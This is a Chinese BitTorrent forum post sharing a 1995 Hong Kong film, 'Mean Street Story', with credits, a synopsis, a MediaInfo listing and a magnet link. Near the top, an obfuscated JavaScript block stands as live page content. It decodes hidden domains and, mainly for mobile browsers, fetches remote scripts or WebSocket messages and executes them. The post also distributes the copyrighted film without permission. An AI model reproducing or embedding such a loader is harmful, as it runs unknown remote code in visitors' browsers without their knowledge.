庙街故事[国粤语音轨/简繁字幕].Mean.Street.Story.1995.NF.WEB-DL.1080p.H.264.AAC.&.DD.2.0.2Audios 4.86GB

版主小s 1月前 244

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 庙街故事 / Mean Street Story
◎片  名 廟街故事
◎年  代 1995
◎产  地 中国香港
◎类  别 剧情
◎语  言 粤语
◎上映日期 1995-05-06
◎IMDb链接 https://www.imdb.com/title/tt0113809/
◎豆瓣评分 6.6/10 (1800人评价)
◎豆瓣链接 https://movie.douban.com/subject/1300205/
◎片  长 100 分钟
◎导  演 刘伟强 Andrew Lau (id:1106979)
◎编  剧 王晶 Jing Wong (id:1274331)
◎演  员 郑伊健 Ekin Cheng (id:1031793)
       吴倩莲 Chien-lien Wu (id:1166703)
       葛民辉 Eric Kot (id:1017040)
       朱咪咪 Mimi Chu (id:1275715)
       刘晓彤 Bell Lau Hiu Tung (id:1350289)
       黄光亮 Kwong Leung Wong (id:1301194)
       罗莽 Meng Lo (id:1025509)
       王书麒 Jimmy Wong Shu-Kei (id:1335539)
       西瓜刨 Gwa-pau Sai (id:1220481)
       李兆基 Siu-Kei Lee (id:1275475)
       刘伟强 Andrew Lau (id:1106979)

◎标  签 香港 / 郑伊健 / 香港电影 / 刘伟强 / 吴倩莲 / 黑帮 / 爱情 / 1995

◎简  介
  香港庙街,鱼龙混杂。自幼在这里长大的阿庙(郑伊健 饰)见识生活的残酷种种,父亲在他很小时被人当街砍死,母亲靠唱黄色歌曲养活儿子。年轻帅气且重义气的阿庙拥有诸多追求者,更有螃蟹(葛民辉 饰)这样一个好朋友。阿庙生日那天,他在深圳放烟火时结识了美丽的富家女小篆(吴倩莲 饰)。当晚,小篆被流氓骚扰,阿庙出手相救杀死流氓,因此入狱四年。                                    
                                四年后,阿庙出狱,此时小篆已经成为电台的DJ。通过电波,这两个互有好感的年轻人重新取得联系。然而他们毕竟身份悬殊,阿庙在小篆父亲的公司谋得一分职位,却无法适应这种所谓上流社会的生活。小篆的父亲为了让女儿和这个“小流氓”分手,不惜采取陷害的手段。阿庙因此被俘债务,甚至因此与庙街的黑道发生冲突。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 101784866183483136732490467263215807077 (0x4C930D5ACE098880E23EEA6E97DFAA65)

  4. Complete name                            : Mean Street Story 1995 NF WEB-DL 1080p H.264 AAC & DD 2.0 [email protected]

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 4.86 GiB

  8. Duration                                 : 1 h 39 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 6 991 kb/s

  11. Encoded date                             : UTC 2021-08-26 20:36:01

  12. Writing application                      : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID                                       : 1

  16. Format                                   : AVC

  17. Format/Info                              : Advanced Video Codec

  18. Format profile                           : [email protected]

  19. Format settings                          : CABAC / 4 Ref Frames

  20. Format settings, CABAC                   : Yes

  21. Format settings, Reference frames        : 4 frames

  22. Codec ID                                 : V_MPEG4/ISO/AVC

  23. Duration                                 : 1 h 39 min

  24. Bit rate mode                            : Variable

  25. Bit rate                                 : 6 540 kb/s

  26. Maximum bit rate                         : 20.0 Mb/s

  27. Width                                    : 1 920 pixels

  28. Height                                   : 1 080 pixels

  29. Display aspect ratio                     : 16:9

  30. Frame rate mode                          : Constant

  31. Frame rate                               : 23.976 (24000/1001/53354) FPS

  32. Color space                              : YUV

  33. Chroma subsampling                       : 4:2:0

  34. Bit depth                                : 8 bits

  35. Scan type                                : Progressive

  36. Bits/(Pixel*Frame)                       : 0.132

  37. Stream size                              : 4.55 GiB (94%)

  38. Writing library                          : x264 core 148 r2715 7e75228

  39. Encoding settings                        : cabac=1 / ref=4 / deblock=1:0:0 / analyse=0x3:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=120 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=2 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=16 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=121 / scenecut=0 / intra_refresh=0 / rc_lookahead=240 / rc=crf / mbtree=1 / crf=20.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / vbv_maxrate=20000 / vbv_bufsize=25000 / crf_max=0.0 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:0.80

  40. Default                                  : Yes

  41. Forced                                   : No


  42. Audio #1

  43. ID                                       : 2

  44. Format                                   : AAC LC SBR

  45. Format/Info                              : Advanced Audio Codec Low Complexity with Spectral Band Replication

  46. Commercial name                          : HE-AAC

  47. Format settings                          : Explicit

  48. Codec ID                                 : A_AAC-2

  49. Duration                                 : 1 h 39 min

  50. Bit rate                                 : 128 kb/s

  51. Channel(s)                               : 2 channels

  52. Channel layout                           : L R

  53. Sampling rate                            : 48.0 kHz

  54. Frame rate                               : 23.438 FPS (2048 SPF)

  55. Compression mode                         : Lossy

  56. Stream size                              : 91.1 MiB (2%)

  57. Title                                    : Netflix 粤语

  58. Language                                 : Chinese

  59. Default                                  : Yes

  60. Forced                                   : No


  61. Audio #2

  62. ID                                       : 3

  63. Format                                   : AC-3

  64. Format/Info                              : Audio Coding 3

  65. Commercial name                          : Dolby Digital

  66. Codec ID                                 : A_AC3

  67. Duration                                 : 1 h 39 min

  68. Bit rate mode                            : Constant

  69. Bit rate                                 : 320 kb/s

  70. Channel(s)                               : 2 channels

  71. Channel layout                           : L R

  72. Sampling rate                            : 48.0 kHz

  73. Frame rate                               : 31.250 FPS (1536 SPF)

  74. Compression mode                         : Lossy

  75. Stream size                              : 228 MiB (5%)

  76. Title                                    : DVD 国语

  77. Language                                 : Chinese

  78. Service kind                             : Complete Main

  79. Default                                  : No

  80. Forced                                   : No


  81. Text #1

  82. ID                                       : 4

  83. Format                                   : UTF-8

  84. Codec ID                                 : S_TEXT/UTF8

  85. Codec ID/Info                            : UTF-8 Plain Text

  86. Duration                                 : 1 h 36 min

  87. Bit rate                                 : 73 b/s

  88. Count of elements                        : 1500

  89. Stream size                              : 51.8 KiB (0%)

  90. Title                                    : 简体中文

  91. Language                                 : Chinese

  92. Default                                  : Yes

  93. Forced                                   : No


  94. Text #2

  95. ID                                       : 5

  96. Format                                   : UTF-8

  97. Codec ID                                 : S_TEXT/UTF8

  98. Codec ID/Info                            : UTF-8 Plain Text

  99. Duration                                 : 1 h 36 min

  100. Bit rate                                 : 73 b/s

  101. Count of elements                        : 1500

  102. Stream size                              : 51.8 KiB (0%)

  103. Title                                    : 繁体中文

  104. Language                                 : Chinese

  105. Default                                  : No

  106. Forced                                   : No



TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:E50CBBE82C475552E4A5FFE82B286D8324C2335F
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回